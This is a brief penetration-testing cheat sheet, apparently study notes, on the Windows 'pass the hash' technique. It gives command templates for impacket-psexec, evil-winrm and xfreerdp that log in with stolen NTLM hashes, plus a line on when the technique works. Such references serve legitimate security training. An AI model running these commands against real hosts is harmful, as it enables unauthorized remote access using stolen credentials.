# Pass the hash

## Pass the hash

impacket-psexec ‘\<domain>/\<user>@\<ip>’ -hashes ‘\<lmhash>:\<nthash>’

impacket-psexec ‘\<domain>/\<user>@\<ip>’ -hashes ‘:\<nthash>’

impacket-psexec ‘\<domain>/\<user>@\<ip>’ -hashes ‘\<lmhash>:’

evil-winrm -i 192.168.50.220 -u deadmin -H sdcsvgv6ggfdb566516fsf

xfreerdp /u:\<user> /d:\<domain> /pth:\<hash> /v:\<ipAddr> /workarea /smart-sizing /cert:ignore +clipboard

Pass the hash can be used in NTLM Authentication case .

Since the 2014 security update, this technique can not be used to authenticate as any other local admin account.